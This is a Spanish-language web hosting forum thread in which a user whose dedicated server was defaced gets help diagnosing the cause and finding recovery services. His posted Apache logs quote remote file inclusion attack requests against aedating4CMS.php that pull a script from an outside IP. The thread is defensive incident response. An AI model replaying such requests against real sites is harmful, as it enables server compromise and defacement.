Antiguo 03-sep-2006, 08:00   #1 (permalink)
Usuario activo
 
Fecha de Ingreso: agosto-2006
Ubicación: Colombia
Mensajes: 56
oscarva sin puntos positivos o negativos
Predeterminado

Bueno pues asi es, me hakearon el server dedicado :( no se como ni quien, todas mis paginas muestran un mensaje de que ha sido hakeado por estar en usa, es de uno de esos grupos fundamentalistas o algo asi y la verdad no se que hacer, por ahora tumbe el apache para que no muestre nada pero debo solucionarlo. lo extraño es que si descargo por ftp cualquier archivo desde mi server este tiene el codigo html del mensaje y no como estaba antes. esto quiere decir que cambiaron el codigo de cada archivo de mi server?

porfa ayuda gracias
oscarva está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 03-sep-2006, 18:24   #2 (permalink)
Administrador
 
Avatar de Apolo
 
Fecha de Ingreso: febrero-2006
Ubicación: Colombia
Mensajes: 4.189
Apolo sigue por muy buen camino
Predeterminado

oscarva, lamento esto que te ha ocurrido.

Sinceramente mi mejor consejo es que (1) contrates un profesional para intentar recuperar tu equipo y (2) en adelante contrates un servidor manejado. Infortunadamente muchos como tú se dan cuenta de esta amarga manera que manejar apropiadamente un servidor es un asunto especializado. No se trata solamente de tener un panel de control para poner a funcionar unos sitios web.

No conozco ninguna empresa que te pueda ofrecer el servicio de recuperación con soporte en español, y nosotros atendemos únicamente los servidores administrados dentro de nuestra propia red. Si puedes manejarte con soporte en inglés, te recomiendo que contactes a Jeff en rackaid.com. Dile que "Apolo" de WHT forums te recomendó sus servicios. Lo no tan bueno es que sus servicios no son económicos y que mantienen muy ocupados, pero son realmente buenos.

Avísanos cualquier cosa!

Saludos!
__________________
ComunidadHosting.com
Apolo esta en línea ahora  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 03-sep-2006, 21:45   #3 (permalink)
Usuario activo
 
Fecha de Ingreso: agosto-2006
Ubicación: Colombia
Mensajes: 56
oscarva sin puntos positivos o negativos
Predeterminado

Hola apolo gracias por tu respuesta.

bueno el atake consistio en modificar todos los archivos index.php o index.html de mi servidor, intente subirlos de nuevo y arreglar momentaneamente el problema pero entonces ahora fui hakeado por un chileno que hizo exactamente lo mismo cambio los index y me dejo un mensaje diciendo que el podria ayudarme a solucionar los problemas de seguridad Xd.

me recomiendas algun proveedor en especial? economicos y manejados?
yo tengo hostforweb.com no se que tal te parece?

por otro lado sabes como se puede encontrar la vulnerabilidad? y como demonios aran para hacer este cambio? ya modifique mi pass por una muy segura pero ahun asi el chileno este me volvio a hakear.

Un abrazo
oscarva está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 03-sep-2006, 21:56   #4 (permalink)
Usuario activo
 
Fecha de Ingreso: agosto-2006
Ubicación: Colombia
Mensajes: 56
oscarva sin puntos positivos o negativos
Predeterminado

Hola apolo.

weno estuve en la web que me diste pero por mas que busco no encuentro la forma de contactarlos. por otro lado no conoces algun amigo o alguien aca en colombia que me pueda ayudar en eso? te agradezco
oscarva está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 03-sep-2006, 22:30   #5 (permalink)
Administrador
 
Avatar de Apolo
 
Fecha de Ingreso: febrero-2006
Ubicación: Colombia
Mensajes: 4.189
Apolo sigue por muy buen camino
Predeterminado

Cita:
Iniciado por oscarva
estuve en la web que me diste pero por mas que busco no encuentro la forma de contactarlos
Mira: https://www.rackaid.com/request_services.cfm

El enlace está en la página de inicio, donde dice "Service Request". :)

Saludos!
__________________
ComunidadHosting.com
Apolo esta en línea ahora  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 03-sep-2006, 23:23   #6 (permalink)
Usuario activo
 
Fecha de Ingreso: julio-2006
Ubicación: España
Mensajes: 1.460
AMateos sigue por muy buen camino
Enviar un mensaje por MSN a AMateos Enviar un mensaje por Skype™ a AMateos
Predeterminado

Una buena compañía en servidores Fully Managed son www.allmanaged.com (Al menos, eso he escuchado)

Un saludo
AMateos está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 05-sep-2006, 02:58   #7 (permalink)
Usuario activo
 
Avatar de WebTech
 
Fecha de Ingreso: julio-2006
Ubicación: Infranetworking.com
Mensajes: 643
WebTech sigue por muy buen camino
Enviar un mensaje por MSN a WebTech
Predeterminado

También podrías utilizar los servicios de www.totalserversolutions.com, incluso tienen técnicos hispanos que te pueden ayudar mucho.

Suerte!
__________________
INFRANETWORKING.COM - Web Hosting Profesional
Hosting Compartido - Hosting Reseller: cPanel, Fantástico, 100% en español.
Servidores Dedicados: 100% administrados, Sistemas de Backups, Optimización y Securización.
Administración de Servidores: Administración y Monitorización las 24 horas.
WebTech está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 05-sep-2006, 06:19   #8 (permalink)
Usuario activo
 
Fecha de Ingreso: agosto-2006
Ubicación: Colombia
Mensajes: 56
oscarva sin puntos positivos o negativos
Predeterminado

Gracias a todos por sus respuestas. voy a estudiar los que me recomendaron
oscarva está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 06-sep-2006, 00:19   #9 (permalink)
Usuario activo
 
Fecha de Ingreso: agosto-2006
Ubicación: Colombia
Mensajes: 56
oscarva sin puntos positivos o negativos
Predeterminado

Hola.

bueno e estado mirando detenidamente mis logs y lo unico que he encontrado es esto:

Código:
xx.xxx.xxx.xx - - [03/Sep/2006:21:17:58 -0500] "GET /index.php/inc/cmses/aedating4CMS.php?dir%5binc%5d=http://61.19.55.250/icons/lol1.txt%3f HTTP/1.1" 302 284 "-" "libwww-perl/5.805"
xx.xxx.xxx.xx - - [03/Sep/2006:21:18:03 -0500] "GET /index.php/inc/cmses/aedating4CMS.php?dir[inc]=http://61.19.55.250/icons/lol1.txt? HTTP/1.1" 301 339 "-" "libwww-perl/5.79"
xx.xxx.xxx.xx - - [03/Sep/2006:21:18:03 -0500] "GET /index.php/inc/cmses/aedating4CMS.php?dir%5binc%5d=http://61.19.55.250/icons/lol1.txt%3f HTTP/1.1" 302 284 "-" "libwww-perl/5.79"
xx.xxx.xxx.xx - - [03/Sep/2006:21:18:04 -0500] "GET /index.php/inc/cmses/aedating4CMS.php?dir[inc]=http://61.19.55.250/icons/lol1.txt? HTTP/1.1" 301 339 "-" "libwww-perl/5.79"
xx.xxx.xxx.xx - - [03/Sep/2006:21:18:04 -0500] "GET /index.php/inc/cmses/aedating4CMS.php?dir[inc]=http://61.19.55.250/icons/lol1.txt? HTTP/1.1" 301 339 "-" "libwww-perl/5.803"
se repite esta entrada durante mas de 6 horas y esta justo en la hora en que los index de mi sitio fueron cambiados. la ip desde donde se genera la consulta no siempre es la misma, sera este el problema? recuerdo tener instado el aedating4 en un dominio de pruebas, sera que por este script fue que entraron alli estara la bulneravilidad?

Un saludo
oscarva está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 06-sep-2006, 02:18   #10 (permalink)
Administrador
 
Avatar de Apolo
 
Fecha de Ingreso: febrero-2006
Ubicación: Colombia
Mensajes: 4.189
Apolo sigue por muy buen camino
Predeterminado

Hola oscarva,

Es muy probable que haya sido por allí. Se trata de una vulnerabilidad reportada hace muy poco, que permite incluir (include) un archivo remoto y desconozco si existe ya un parche para ello. Encuentras información del reporte en SecurityDOT:

http://securitydot.net/xpl/exploits/...0/exploit.html

Al parecer estos archivos son los que se afectan:

aedating4CMS.php
aedatingCMS.php
aedatingCMS2.php

De todas formas puedes consultar este otro recurso, pues al parecer allí dan alguna solución:

http://www.expcode.com/webapps/2006/0905/1919.html

Vuelvo a insistirte en que contrates los servicios de un profesional al respecto, pues tu servidor puede estar ya comprometido. Puede que cubras la herida, pero la infección puede estar ya por dentro.

Saludos!
__________________
ComunidadHosting.com
Apolo esta en línea ahora  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 06-sep-2006, 04:48   #11 (permalink)
Usuario activo
 
Fecha de Ingreso: agosto-2006
Ubicación: Colombia
Mensajes: 56
oscarva sin puntos positivos o negativos
Predeterminado

Hola apolo gracias por tu ayuda.

bueno trabajare en correjir el problema temporalmente para luego mirar lo del cambio de servidor.

Saludos
oscarva está desconectado  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Antiguo 06-sep-2006, 04:51   #12 (permalink)
Administrador
 
Avatar de Apolo
 
Fecha de Ingreso: febrero-2006
Ubicación: Colombia
Mensajes: 4.189
Apolo sigue por muy buen camino
Predeterminado

Cita:
Iniciado por oscarva
Hola apolo gracias por tu ayuda
No hay problema, es con mucho gusto

Saludos. :)
__________________
ComunidadHosting.com
Apolo esta en línea ahora  
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Responder Citando
Respuesta

Herramientas
Desplegado

Normas de Publicación
No puedes crear nuevos temas
No puedes responder temas
No puedes subir archivos adjuntos
No puedes editar tus mensajes

Los Códigos BB están Activado
Las Caritas están Activado
[IMG] está Activado
El Código HTML está Desactivado
Trackbacks are Activado
Pingbacks are Activado
Refbacks are Activado

Temas Similares
Tema Autor Foro Respuestas Último mensaje
holas soy nuebo una ayudqa plis bolivianhell Software para hosting y Paneles de control 2 13-feb-2008 13:24

Alojamiento web, Hosting Reseller, Servidores Dedicados - All in Hosting

La franja horaria es GMT. Ahora son las 22:52.

Rioserver
Web hosting y dominios
Planes de hosting desde 2.90 USD
Soporte 24/7

www.rioserver.com

Infranetworking.com
Hosting PHP-MySQL
desde $3,5 dólares al mes!
Servidores Dedicados Hosting Reseller
www.infranetworking.com

Hosting en Mexico
500 Mb de espacio 29 pesos al mes
Soporte 24 h, cpanel,
Solicite prueba gratuita.

www.albergueweb.com.mx

AQPhost es Hosting Reseller
Te asesoramos
Inicia tu empresa de Web Hosting
¡hoy mismo!

www.aqphost.com/revendedores.htm


     ComunidadHosting  

La más grande comunidad dedicada al web hosting en nuestro idioma.

Para anunciar en ComunidadHosting, o para información general, por favor utiliza el formulario de contacto.




Allinhosting v


Desarrollado por: vBulletin® Versión 3.7.4
Derechos de Autor ©2000 - 2009, Jelsoft Enterprises Ltd.
Traducido por mcloud de vBhispano.com

Search Engine Friendly URLs by vBSEO 3.2.0